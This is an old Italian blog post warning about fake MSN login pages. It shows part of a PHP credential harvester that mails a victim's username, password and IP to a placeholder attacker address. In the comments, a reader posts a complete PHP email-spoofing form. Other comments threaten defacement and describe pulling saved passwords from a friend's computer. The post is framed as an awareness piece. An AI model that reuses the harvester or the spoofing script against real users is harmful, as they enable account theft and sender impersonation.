Profil de Amoga<----> # Amoga Official ...PhotosBlogListesPlus Outils Aide

Blog


mai 2006

Fake Mail

Fake Mail
 
 
 
 
Molte volte ci sono dei ragazzi che non hanno niente da fare e vogliono
rubare password di account msn.
Un metodo spesso utilizzato è la fake mail in php.
E' una pagina tale e quale alla originale ma quando
andremo a inserire i dati verranno spediti automaticamente
al nemico.
Quindi se qualcuno vi indirizza in un sito con interfaccia di msn
voi non inserite mai i vostri dati.
Adesso vi faccio capire meglio.
Questo è il codice sorgente in php della fake mail
non lo inserisco tutto per evitare lamerate*
Ecco il codice sorgente:
<?
###################################
###########################
##########Amoga Official Security ############
###############################
###################################
 
///////////////////////////////////
$yourmail = "Qui và l'indirizzo dove vanno i dati della vittima";  //Inserisci qui il tuo indirizzo di posta
///////////////////////////////////
 
 
// DA QUI IN POI NON MODIFICATE NULLA!!
if (getenv(HTTP_X_FORWARDED_FOR)){
$ip = getenv(HTTP_X_FORWARDED_FOR); } else {
$ip = getenv(REMOTE_ADDR); }
$useragent=$_SERVER['HTTP_USER_AGENT'];
      $td = date("F jS");
      $date = date("d M, Y");
      $time = date("g:i a");
      $LogTime = trim(" Date: ".$date.", Time: ".$time);
mail("$yourmail", "Account $account", "Username: $account \nPassword:
**Censured**
 
State molto attenti a queste cose.
Il codice non è completo.
Perchè questa è solo una dimostrazione per far capire alle persone
che possono cadere nell'inganno.
 
*Lamerate= Deriva dal termine lamer che è una persona che distrugge & ruba sul web per divertimento.
 
 
 
Per Problemi:
Contattatemi su Msn Messenger: Amoga@hotmail.it
Mandatemi una E-mail: Amoga@tiscali.it
Andate sul sito ufficiale: www.amoga.altervista.org
 
Ricordate:
Prendete il link del mio Blog:
e inseritelo nel vostro blog
mi aiuterete a crescere Grazie ^_^

Commentaires (6)

Veuillez patienter...
Le commentaire entré est trop long. Raccourcissez-le.
Vous n'avez rien entré. Réessayez.
Il est actuellement impossible d'ajouter votre commentaire. Réessayez plus tard.
Pour ajouter un commentaire, tu dois avoir l'autorisation de tes parents. Demander l'autorisation
Tes parents ont désactivé les commentaires.
Il est actuellement impossible de supprimer votre commentaire. Réessayez plus tard.
Vous avez dépassé le nombre maximal de commentaires qu'il est possible d'envoyer le même jour. Réessayez dans 24 heures.
Votre compte a pu laisser les commentaires désactivés parce que nos systèmes indiquent que vous risquez d'arroser d'autres utilisateurs de messages. Si vous pensez que votre compte a été désactivé par erreur, contactez l'assistance en ligne de Windows Live.
Effectuez la vérification de sécurité ci-dessous pour finaliser l'envoi de votre commentaire.
Les caractères entrés pour la vérification de sécurité doivent correspondre à ceux de l'image ou du fichier audio.

Pour ajouter un commentaire, connectez-vous avec votre identifiant Windows Live ID (si vous utilisez Messenger ou Xbox LIVE, vous avez un identifiant Windows Live ID). Connectez-vous


Vous n'avez pas d'identifiant Windows Live ID ? Inscrivez-vous

GenShellCr​ewa écrit :
se lo publichi su un sito gratis come ad esempio altervista dopo 2 giorni te lo levano poi di solito si fanno i fake login
sul codice che hai postato manca tutto
come dice darkknignt serve quel codice che ha postato, studia prima di cazzegiare altrimenti ti defaccio il sito
http://genshellcrew.altervista.org
quello è il mio sito...
29 Nov.
Image de Anonyme
DarkKnignt a écrit :
Lol,secondo me una volta dichiarate le variabili non hai saputo più scrivere il resto. Valà,studiatelo e se vuoi visitami a http://www.italyhacker.tk


0/** SAVE AS mail.php **/ 
1
2<title>Fake Email Sender</title> 
3<style> 
4body {background-color:#000000; font-family:verdana; font-size:8pt;} 
5table, tr, td {font-family:verdana; font-size:8pt; color:#ffffff;} 
6input {font-family:verdana; font-size:8pt; color:#ffffff; background-color:#000000; border:1px solid white; padding:2px;} 
7select, option {font-family:verdana; font-size:8pt; color:#ffffff; background-color:#000000; border:0px;} 
8h1 {font-family:verdana; font-size:16pt; color:#ffffff;) 
9</style> 
10<center> 
11<table border=0 style="background-color:#000000; border:1px solid #ff0000; text-align:center;" cellspacing=0 cellpadding=3> 
12<tr><td style="background-color:#000000; border:1px solid #ff0000; text-align:center;" colspan=2"><h1>FAKE EMAIL FORM</h1> 
13<tr><td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> 
14<form action=send_mail.php method=get> 
15Friends Email:<td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> <input type=text name=email><br><br> 
16<tr><td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> 
17Header:<td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> <input type=text name=header><br><br> 
18<tr><td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> 
19Your Fake Email:<td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> <input type=text name=fake><br><br> 
20<tr><td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"> 
21Email Message: <td style="background-color:#000000; border:1px solid #ff0000; text-align:justify;"><textarea name=message style="width:100px; height:50px;"></textarea><br><br> 
22<input type=submit value=Send Your Email><input type=reset value=Reset> 
23</form> 
24</center> 
25
26/** SAVE AS send_mail.php **/ 
27
28<?php 
29
30$to = $_GET[email]; 
31$subject = $_GET[header]; 
32$fake = $_GET[fake]; 
33
34$message = $_GET[message]; 
35
36$headers = "MIME-Version: 1.0" . "\r\n"; 
37$headers .= "Content-type:text/html;charset=iso-8859-1" . "\r\n"; 
38
39$headers .= 'From: Your friend' . "\r\n"; 
40
41mail($to,$subject,$message,$headers); 
42?> 
43<?php 
44
45echo "Your email has been sent to $to."; 
46echo "<br>"; 
47echo "Your email subject is $subject."; 
48echo "<br>"; 
49echo "The email sent as is $fake."; 
50echo "<br>"; 
51echo "Your message was <quote>$message</quote>."; 
52echo "<br>" . "<br>" . "<br>"; 
53echo "To send this email more than one just refresh the page!"; 
54?>
4 Nov.
Image de Anonyme
Nessuno a écrit :
Genio, oddio ha semplicemente copiato il passo da un altro sito e lo ha postato... A parte che bisogna essere davvero stupidi per non guardare nella barra degli indirizzi e vedere una pagina che non appartiene alla microsoft ma è identica a quella dell'accesso a windows live.... Quelli che vi fottono le password non sono altro che vostri amici, quando accedete dai loro pc... basta spuntare anke un secondo la casella salva pass e poi con un recovery è fatta... XD
10 Juin
Pieroa écrit :
ciao passavo nel tuo blog ma tu 6 un genio ma cosa 6 come fai a sapere queste cose? :D cmq se vuoi passa anke dal mio se ti và grazie io vorrei ke nel mio media player mettere + canzioni nn solo 1 come fare me lo dici grazie 1000
9 Fév.
Luiginho Deliaa écrit :
Mah....ma nn ne hanno altri passatempi....al posto di rompere al prossimo....???
13 Jan.
alessia bruscaa écrit :
interessante l tuo blog....graze delle spegazioni...t aggiungo nel mio blog cm hai kiesto,...ciao un kiss ale...vienimi a trovare!
4 Jan.

Rétroliens

Blogs Web qui font référence à ce billet
  • Aucune